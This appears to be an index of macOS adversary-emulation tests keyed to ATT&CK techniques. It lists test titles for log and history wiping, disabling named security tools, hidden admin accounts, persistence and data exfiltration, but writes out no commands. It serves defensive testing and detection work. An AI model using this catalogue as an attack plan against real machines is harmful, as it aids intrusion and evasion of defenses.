discovery,T1082,System Information Discovery,13,Show System Integrity Protection status (MacOS),327cc050-9e99-4c8e-99b5-1d15f2fb6b96,sh
discovery,T1082,System Information Discovery,33,sysctl to gather macOS hardware info,c8d40da9-31bd-47da-a497-11ea55d1ef6c,sh
discovery,T1497.003,Time Based Evasion,1,Delay execution with ping,8b87dd03-8204-478c-bac3-3959f6528de3,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1217,Browser Bookmark Discovery,9,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,8,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
discovery,T1614,System Location Discovery,2,"Get geolocation info through IP-Lookup services using curl freebsd, linux or macos",552b4db3-8850-412c-abce-ab5cc8a86604,bash
discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,12,Port Scan using nmap (Port range),0d5a2b03-3a26-45e4-96ae-89485b4d1f97,sh
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1124,System Time Discovery,3,System Time Discovery in FreeBSD/macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1059.002,Command and Scripting Interpreter: AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,14,Shell Creation using awk command,ee72b37d-b8f5-46a5-a9e7-0ff50035ffd5,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,15,Creating shell using cpan command,bcd4c2bc-490b-4f91-bd31-3709fe75bbdf,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,17,emacs spawning an interactive system shell,e0742e38-6efe-4dd4-ba5c-2078095b6156,sh
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
impact,T1531,Account Access Removal,5,Delete User via dscl utility,4d938c43-2fe8-4d70-a5b3-5bf239aa7846,sh
impact,T1531,Account Access Removal,6,Delete User via sysadminctl utility,d3812c4e-30ee-466a-a0aa-07e355b561d6,sh
impact,T1486,Data Encrypted for Impact,6,Encrypt files using 7z utility - macOS,645f0f5a-ef09-48d8-b9bc-f0e24c642d72,sh
impact,T1486,Data Encrypted for Impact,7,Encrypt files using openssl utility - macOS,1a01f6b8-b1e8-418e-bbe3-78a6f822759e,sh
impact,T1496,Resource Hijacking,1,FreeBSD/macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,sh
impact,T1485,Data Destruction,2,FreeBSD/macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,sh
impact,T1490,Inhibit System Recovery,12,Disable Time Machine,ed952f70-91d4-445a-b7ff-30966bfb1aff,sh
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,sh
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - FreeBSD/macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,sh
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - FreeBSD/macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,sh
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,2,Exfiltrate data with rclone to cloud Storage - AWS S3,a4b74723-5cee-4300-91c3-5e34166909b4,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 sh
3 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 sh
4 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 sh
5 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
6 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
7 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
8 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 sh
9 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
10 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
11 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 11 Chmod through c script 973631cf-6680-4ffa-a053-045e1b6b67ab sh
12 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 13 Chown through c script 18592ba1-5f88-4e3c-abc8-ab1c6042e389 sh
13 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 1 Decode Eicar File and Write to File 7693ccaa-8d64-4043-92a5-a2eb70359535 powershell
14 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 2 Decrypt Eicar File and Write to File b404caaa-12ce-43c7-9214-62a531c044f7 powershell
15 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
16 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
17 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 5 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
18 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
19 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via ioreg a960185f-aef6-4547-8350-d1ce16680d09 sh
20 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 6 Detect Virtualization Environment using sysctl (hw.model) 6beae646-eb4c-4730-95be-691a4094408c sh
21 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 7 Check if System Integrity Protection is enabled 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945 sh
22 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 8 Detect Virtualization Environment using system_profiler e04d2e89-de15-4d90-92f9-a335c7337f0f sh
23 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
24 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 3 Delete log files using built-in log utility 653d39cd-bae7-499a-898c-9fb96b8b5cd1 sh
25 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 4 Truncate system log files via truncate utility 6290f8a8-8ee9-4661-b9cf-390031bf6973 sh
26 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 6 Delete log files via cat utility by appending /dev/null or /dev/zero c23bdb88-928d-493e-b46d-df2906a50941 sh
27 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 8 System log file deletion via find utility bc8eeb4a-cc3e-45ec-aa6e-41e973da2558 sh
28 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 9 Overwrite macOS system log via echo utility 0208ea60-98f1-4e8c-8052-930dce8f742c sh
29 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 11 Real-time system log clearance/deletion 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c sh
30 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 12 Delete system log files via unlink utility 03013b4b-01db-437d-909b-1fdaa5010ee8 sh
31 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 14 Delete system log files using shred utility 86f0e4d5-3ca7-45fb-829d-4eda32b232bb sh
32 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 15 Delete system log files using srm utility b0768a5e-0f32-4e75-ae5b-d036edcf96b6 sh
33 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 16 Delete system log files using OSAScript 810a465f-cd4f-47bc-b43e-d2de3b033ecc sh
34 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 17 Delete system log files using Applescript e62f8694-cbc7-468f-862c-b10cd07e1757 sh
35 defense-evasion T1553.001 Subvert Trust Controls: Gatekeeper Bypass 1 Gatekeeper Bypass fb3d46c6-9480-4803-8d7d-ce676e1f1a9b sh
36 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
37 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
38 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
39 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
40 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 bash
41 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
42 defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
43 defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
44 defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
45 defense-evasion T1140 Deobfuscate/Decode Files or Information 8 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
46 defense-evasion T1140 Deobfuscate/Decode Files or Information 9 Linux Base64 Encoded Shebang in CLI 3a15c372-67c1-4430-ac8e-ec06d641ce4d sh
47 defense-evasion T1140 Deobfuscate/Decode Files or Information 10 XOR decoding and command execution using Python c3b65cd5-ee51-4e98-b6a3-6cbdec138efc bash
48 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 3 Copy and Delete Mailbox Data on macOS 3824130e-a6e4-4528-8091-3a52eeb540f6 bash
49 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 6 Copy and Modify Mailbox Data on macOS 8a0b1579-5a36-483a-9cde-0236983e1665 bash
50 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
51 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
52 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
53 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
54 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 9 MacOS - Timestomp Date Modified 87fffff4-d371-4057-a539-e3b24c37e564 sh
55 defense-evasion T1497.003 Time Based Evasion 1 Delay execution with ping 8b87dd03-8204-478c-bac3-3959f6528de3 sh
56 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
57 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 2 Pad Binary to Change Hash using truncate command - Linux/macOS e22a9e89-69c7-410f-a473-e6c212cd2292 sh
58 defense-evasion T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
59 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
60 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
61 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
62 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
63 defense-evasion T1647 Plist File Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
64 defense-evasion T1564.002 Hide Artifacts: Hidden Users 1 Create Hidden User using UniqueID < 500 4238a7f0-a980-4fff-98a2-dfc0a363d507 sh
65 defense-evasion T1564.002 Hide Artifacts: Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
66 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
67 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 3 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
68 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 6 Disable Carbon Black Response 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c sh
69 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 7 Disable LittleSnitch 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 sh
70 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 8 Disable OpenDNS Umbrella 07f43b33-1e15-4e99-be70-bc094157c849 sh
71 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 9 Disable macOS Gatekeeper 2a821573-fb3f-4e71-92c3-daac7432f053 sh
72 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 10 Stop and unload Crowdstrike Falcon on macOS b3e7510c-2d4c-4249-a33f-591a2bc83eef sh
73 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 47 Tamper with Defender ATP on Linux/MacOS 40074085-dbc8-492b-90a3-11bcfc52fda8 sh
74 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
75 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 4 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh
76 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 sh
77 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe sh
78 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 sh
79 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 1 Delete a single file - FreeBSD/Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
80 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - FreeBSD/Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
81 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 3 Binary simply packed by UPX b16ef901-00bb-4dda-b4fc-a04db5067e20 sh
82 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 4 Binary packed by UPX, with modified headers 4d46e16b-5765-4046-9f25-a600d3e65e4d sh
83 defense-evasion T1036.006 Masquerading: Space after Filename 1 Space After Filename (Manual) 89a7dd26-e510-4c9f-9b15-f3bae333360f manual
84 defense-evasion T1036.006 Masquerading: Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea sh
85 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
86 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 2 Mac Hidden file cddb9098-3b47-4e01-9d3b-6f5f323288a9 sh
87 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 5 Hidden files 3b7015f2-3144-4205-b799-b05580621379 sh
88 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 6 Hide a Directory b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 sh
89 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 7 Show all hidden files 9a1ec7da-b892-449f-ad68-67066d04380c sh
90 defense-evasion T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
91 defense-evasion T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
92 defense-evasion T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
93 defense-evasion T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
94 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
95 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
96 persistence T1176 Browser Extensions 1 Chrome/Chromium (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
97 persistence T1176 Browser Extensions 2 Chrome/Chromium (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
98 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
99 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
100 persistence T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
101 persistence T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
102 persistence T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
103 persistence T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
104 persistence T1546.005 Event Triggered Execution: Trap 3 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
105 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
106 persistence T1136.001 Create Account: Local Account 3 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
107 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc sh
108 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
109 persistence T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
110 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
111 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
112 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
113 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
114 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
115 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 2 Add launch script to launch daemon fc369906-90c7-4a15-86fd-d37da624dde6 bash
116 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 3 Add launch script to launch agent 10cf5bec-49dd-4ebf-8077-8f47e420096f bash
117 persistence T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
118 persistence T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
119 persistence T1543.001 Create or Modify System Process: Launch Agent 3 Launch Agent - Root Directory 66774fa8-c562-4bae-a58d-5264a0dd9dd7 bash
120 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
121 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
122 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
123 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
124 persistence T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
125 persistence T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
126 persistence T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
127 persistence T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
128 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
129 command-and-control T1572 Protocol Tunneling 5 Microsoft Dev tunnels (Linux/macOS) 9f94a112-1ce2-464d-a63b-83c1f465f801 bash
130 command-and-control T1572 Protocol Tunneling 6 VSCode tunnels (Linux/macOS) b877943f-0377-44f4-8477-f79db7f07c4d sh
131 command-and-control T1572 Protocol Tunneling 7 Cloudflare tunnels (Linux/macOS) 228c336a-2f79-4043-8aef-bfa453a611d5 sh
132 command-and-control T1090.003 Proxy: Multi-hop Proxy 4 Tor Proxy Usage - MacOS 12631354-fdbc-4164-92be-402527e748da sh
133 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
134 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
135 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 sh
136 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f sh
137 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 sh
138 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 sh
139 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
